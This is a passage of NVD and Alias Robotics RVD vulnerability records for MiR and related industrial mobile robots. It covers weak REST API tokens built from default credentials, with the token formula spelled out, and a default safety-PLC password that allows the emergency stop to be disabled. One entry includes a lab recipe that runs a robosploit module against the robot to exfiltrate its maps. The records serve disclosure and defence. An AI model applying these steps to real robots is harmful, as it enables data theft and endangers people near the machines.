detected-by: "Victor Mayoral Vilches (Alias Robotics)" detected-by-method: testing-dynamic alurity:robo_mir date-reported: '2020-06-24' reported-by: "Victor Mayoral Vilches (Alias Robotics)" reported-by-relationship: security researcher issue: https://github.com/aliasrobotics/RVD/issues/2560 reproducibility: always trace: Not disclosed reproduction: Not disclosed reproduction-image: Not disclosed exploitation: description: Not disclosed exploitation-image: Not disclosed exploitation-vector: Not disclosed exploitation-recipe: '' mitigation: description: Not disclosed pull-request: Not disclosed date-mitigation: null ```
RVD#2560: Unprotected intellectual property in Mobile Industrial Robots (MiR) controllers
https://api.github.com/repos/aliasrobotics/RVD/issues/2560/comments
0
2020-06-24T04:50:27Z
2020-07-10T06:38:06Z
https://github.com/aliasrobotics/RVD/issues/2560
644,315,644
2,560
1,312
CVE-2020-10274
2020-06-24T05:15:13.113
The access tokens for the REST API are directly derived (sha256 and base64 encoding) from the publicly available default credentials from the Control Dashboard (refer to CVE-2020-10270 for related flaws). This flaw in combination with CVE-2020-10273 allows any attacker connected to the robot networks (wired or wireless) to exfiltrate all stored data (e.g. indoor mapping images) and associated metadata from the robot's database.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 5.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 4.2, "source": "cve@aliasrobotics.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 4.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@aliasrobotics.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2556" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2556" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir100_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "4C1ED80A-1AE1-4868-AD13-F37079F69B60", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir100:-:*:*:*:*:*:*:*", "matchCriteriaId": "11F1060F-0F43-4920-A05D-593E784B1A0B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "0E52858B-51DE-44BC-A4BB-D199F1281D72", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir200:-:*:*:*:*:*:*:*", "matchCriteriaId": "2B0F7F08-D5D5-4DA8-B2B2-5EA2997AEE3D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir250_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "0F19DD45-1C6E-498C-A961-5EDB4823B12C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir250:-:*:*:*:*:*:*:*", "matchCriteriaId": "44C6FCBE-E111-419E-8F8D-2F4702D821BA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir500_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "8C63DB5B-961D-4FDD-AB12-01DC24AFC0B9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir500:-:*:*:*:*:*:*:*", "matchCriteriaId": "E2BC5C9E-1AF3-4009-844E-6E64E4D766A8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir1000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "171A2B04-114B-4C5F-9F2C-515A1E37F300", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "C86EB588-CD48-456B-90C6-C482636508AE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:easyrobotics:er200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "42AB077F-A829-4A9F-8AFF-CBC9222EAE55", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:easyrobotics:er200:-:*:*:*:*:*:*:*", "matchCriteriaId": "C275F303-4494-4C06-95CC-8969E01F8ADA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:easyrobotics:er-lite_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "68599AB3-679D-4E86-B8F4-7939A0373EA2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:easyrobotics:er-lite:-:*:*:*:*:*:*:*", "matchCriteriaId": "53543812-4D0D-4191-8B21-803D2F9790B6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:easyrobotics:er-flex_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "1252DDB6-D090-499B-B505-E17625DB88AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:easyrobotics:er-flex:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D84C826-05A4-44A6-BD12-77805A993A5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:easyrobotics:er-one_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "29230027-8A11-48CA-A4E5-63953EB7CAE3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:easyrobotics:er-one:-:*:*:*:*:*:*:*", "matchCriteriaId": "C7FFA6B9-1A77-4C25-8120-6844B8700527", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:uvd-robots:uvd_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "0C870ABF-C324-442E-9738-025397CB3C47", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:uvd-robots:uvd:-:*:*:*:*:*:*:*", "matchCriteriaId": "87684074-A107-4FE3-A840-C5CB3B8025AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "330" ]
330
https://github.com/aliasrobotics/RVD/issues/2556
[ "Third Party Advisory" ]
github.com
[ "aliasrobotics", "RVD" ]
```yaml id: 2556 title: 'RVD#2556: MiR REST API allows for data exfiltration by unauthorized attackers (e.g. indoor maps)' type: vulnerability description: The access tokens for the REST API are directly derived (sha256 and base64 encoding) from the publicly available default credentials from the Control Dashboard (refer to CVE-2020-10270 for related flaws). This flaw in combination with CVE-2020-10273 allows any attacker connected to the robot networks (wired or wireless) to exfiltrate all stored data (e.g. indoor mapping images) and associated metadata from the robot's database. cwe: CWE-200 cve: CVE-2020-10274 keywords: - MiR100, MiR200, MiR500, MiR250, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD system: MiR100:v2.8.1.1 and before, MiR200, MiR250, MiR500, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD vendor: Mobile Industrial Robots A/S, EasyRobotics, Enabled Robotics, UVD Robots severity: rvss-score: 5.6 rvss-vector: RVSS:1.0/AV:IN/AC:L/PR:L/UI:N/Y:Z/S:U/C:H/I:L/A:N/H:N severity-description: medium cvss-score: 7.1 cvss-vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N links: - https://cwe.mitre.org/data/definitions/200.html - https://github.com/aliasrobotics/RVD/issues/2556 flaw: phase: runtime-operation specificity: subject-specific architectural-location: application-specific code application: REST API subsystem: cognition package: N/A languages: N/A date-detected: 2020-05-03 detected-by: Alias Robotics (group, https://aliasrobotics.com) detected-by-method: testing date-reported: '2020-06-24' reported-by: "Victor Mayoral Vilches (Alias Robotics)" reported-by-relationship: security researcher issue: https://github.com/aliasrobotics/RVD/issues/2556 reproducibility: Always trace: Not disclosed reproduction: Not disclosed reproduction-image: Not disclosed exploitation: description: Not disclosed exploitation-image: Not disclosed exploitation-vector: Not disclosed exploitation-recipe: networks: - network: - driver: overlay - name: mireth-network - encryption: false containers: - container: - name: mir100 - modules: - base: registry.gitlab.com/aliasrobotics/offensive/alurity/robo_mir100:2.8.1.1 - network: mireth-network - container: - name: attacker - modules: - base: registry.gitlab.com/aliasrobotics/offensive/alurity/comp_ros:latest - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/expl_robosploit/expl_robosploit:latest - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/deve_atom:latest - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/reco_nmap:latest - network: mireth-network flow: - container: - name: attacker - window: - name: attacker - commands: - command: 'export TARGET=$(nslookup mir100 | awk "NR==6{print$2}" | sed "s/Address: //g")' - command: ls -lh - command: echo "Waiting until the dashboard launches and robot initializes..."; sleep 10 - command: robosploit -m exploits/mir/rest/getmaps -s "target $TARGET" - command: ls -lh - container: - name: mir100 - window: - name: setup - commands: - command: mkdir /var/run/sshd - command: /usr/sbin/sshd - command: /bin/sleep 5 - command: sudo mkdir /run/lock - command: /etc/init.d/apache2 start - split: horizontal - command: /bin/sleep 2 - command: python /usr/local/mir/software/robot/release/db_backup.py - command: /etc/init.d/mysql start - command: /bin/sleep 2 - command: /usr/sbin/mysqld --verbose & - window: - name: ros - commands: - command: python /usr/local/mir/software/robot/release/db_backup.py - command: sudo apt-key adv --keyserver 'hkp://keyserver.ubuntu.com:80' --recv-key C1CF6E31E6BADE8868B172B4F42ED6FBAB17C654 - command: sudo apt-get update - command: roslaunch mirCommon mir_bringup.launch - select: setup - attach: attacker mitigation: description: Not disclosed pull-request: Not disclosed date-mitigation: null ```
RVD#2556: MiR REST API allows for data exfiltration by unauthorized attackers (e.g. indoor maps)
https://api.github.com/repos/aliasrobotics/RVD/issues/2556/comments
0
2020-06-24T04:37:32Z
2020-07-10T06:38:05Z
https://github.com/aliasrobotics/RVD/issues/2556
644,311,434
2,556
1,313
CVE-2020-10275
2020-06-24T05:15:13.193
The access tokens for the REST API are directly derived from the publicly available default credentials for the web interface. Given a USERNAME and a PASSWORD, the token string is generated directly with base64(USERNAME:sha256(PASSWORD)). An unauthorized attacker inside the network can use the default credentials to compute the token and interact with the REST API to exfiltrate, infiltrate or delete data.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "cve@aliasrobotics.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@aliasrobotics.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2565" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2565" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir100_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "4C1ED80A-1AE1-4868-AD13-F37079F69B60", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir100:-:*:*:*:*:*:*:*", "matchCriteriaId": "11F1060F-0F43-4920-A05D-593E784B1A0B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "0E52858B-51DE-44BC-A4BB-D199F1281D72", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir200:-:*:*:*:*:*:*:*", "matchCriteriaId": "2B0F7F08-D5D5-4DA8-B2B2-5EA2997AEE3D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir250_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "0F19DD45-1C6E-498C-A961-5EDB4823B12C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir250:-:*:*:*:*:*:*:*", "matchCriteriaId": "44C6FCBE-E111-419E-8F8D-2F4702D821BA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir500_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "8C63DB5B-961D-4FDD-AB12-01DC24AFC0B9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir500:-:*:*:*:*:*:*:*", "matchCriteriaId": "E2BC5C9E-1AF3-4009-844E-6E64E4D766A8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir1000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "171A2B04-114B-4C5F-9F2C-515A1E37F300", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "C86EB588-CD48-456B-90C6-C482636508AE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:easyrobotics:er200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "42AB077F-A829-4A9F-8AFF-CBC9222EAE55", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:easyrobotics:er200:-:*:*:*:*:*:*:*", "matchCriteriaId": "C275F303-4494-4C06-95CC-8969E01F8ADA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:easyrobotics:er-lite_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "68599AB3-679D-4E86-B8F4-7939A0373EA2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:easyrobotics:er-lite:-:*:*:*:*:*:*:*", "matchCriteriaId": "53543812-4D0D-4191-8B21-803D2F9790B6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:easyrobotics:er-flex_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "1252DDB6-D090-499B-B505-E17625DB88AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:easyrobotics:er-flex:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D84C826-05A4-44A6-BD12-77805A993A5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:easyrobotics:er-one_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "29230027-8A11-48CA-A4E5-63953EB7CAE3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:easyrobotics:er-one:-:*:*:*:*:*:*:*", "matchCriteriaId": "C7FFA6B9-1A77-4C25-8120-6844B8700527", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:uvd-robots:uvd_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "0C870ABF-C324-442E-9738-025397CB3C47", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:uvd-robots:uvd:-:*:*:*:*:*:*:*", "matchCriteriaId": "87684074-A107-4FE3-A840-C5CB3B8025AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "326" ]
326
https://github.com/aliasrobotics/RVD/issues/2565
[ "Third Party Advisory" ]
github.com
[ "aliasrobotics", "RVD" ]
```yaml id: 2565 title: 'RVD#2565: Weak token generation for the REST API.' type: vulnerability description: The access tokens for the REST API are directly derived from the publicly available default credentials for the web interface. Given a USERNAME and a PASSWORD, the token string is generated directly with base64(USERNAME:sha256(PASSWORD)). An unauthorized attacker inside the network can use the default credentials to compute the token and interact with the REST API to exfiltrate, infiltrate or delete data. cwe: CWE-261 cve: CVE-2020-10275 keywords: - MiR100, MiR200, MiR500, MiR250, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD system: MiR100:v2.8.1.1 and before, MiR200, MiR250, MiR500, MiR1000, ER200, ER-Lite, ER-Flex, ER-One, UVD vendor: Mobile Industrial Robots A/S, EasyRobotics, Enabled Robotics, UVD Robots severity: rvss-score: 10.0 rvss-vector: RVSS:1.0/AV:IN/AC:L/PR:N/UI:N/Y:Z/S:U/C:H/I:H/A:H/H:H severity-description: critical cvss-score: 9.8 cvss-vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H links: - https://cwe.mitre.org/data/definitions/261.html - https://github.com/aliasrobotics/RVD/issues/2565 flaw: phase: runtime-operation specificity: subject-specific architectural-location: application-specific code application: REST API subsystem: N/A package: N/A languages: Python date-detected: 2020-06-11 detected-by: Alias Robotics (group, https://aliasrobotics.com) detected-by-method: Testing dynamic. date-reported: '2020-06-24' reported-by: "Victor Mayoral Vilches (Alias Robotics)" reported-by-relationship: security researcher issue: https://github.com/aliasrobotics/RVD/issues/2565 reproducibility: Always trace: Not disclosed reproduction: Not disclosed reproduction-image: Not disclosed exploitation: description: Not disclosed exploitation-image: Not disclosed exploitation-vector: Not disclosed exploitation-recipe: '' mitigation: description: Not disclosed pull-request: Not disclosed date-mitigation: null ```
RVD#2565: Weak token generation for the REST API.
https://api.github.com/repos/aliasrobotics/RVD/issues/2565/comments
0
2020-06-24T04:56:18Z
2020-07-10T06:38:08Z
https://github.com/aliasrobotics/RVD/issues/2565
644,317,700
2,565
1,314
CVE-2020-10276
2020-06-24T05:15:13.270
The password for the safety PLC is the default and thus easy to find (in manuals, etc.). This allows a manipulated program to be uploaded to the safety PLC, effectively disabling the emergency stop in case an object is too close to the robot. Navigation and any other components dependent on the laser scanner are not affected (thus it is hard to detect before something happens) though the laser scanner configuration can also be affected altering further the safety of the device.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "cve@aliasrobotics.com", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@aliasrobotics.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2558" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/aliasrobotics/RVD/issues/2558" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir100_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "4C1ED80A-1AE1-4868-AD13-F37079F69B60", "versionEndExcluding": null, "versionEndIncluding": "2.8.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir100:-:*:*:*:*:*:*:*", "matchCriteriaId": "11F1060F-0F43-4920-A05D-593E784B1A0B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "0E52858B-51DE-44BC-A4BB-D199F1281D72", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:mobile-industrial-robots:mir200:-:*:*:*:*:*:*:*", "matchCriteriaId": "2B0F7F08-D5D5-4DA8-B2B2-5EA2997AEE3D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:mobile-industrial-robots:mir250_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "0F19DD45-1C6E-498C-A961-5EDB4823B12C", 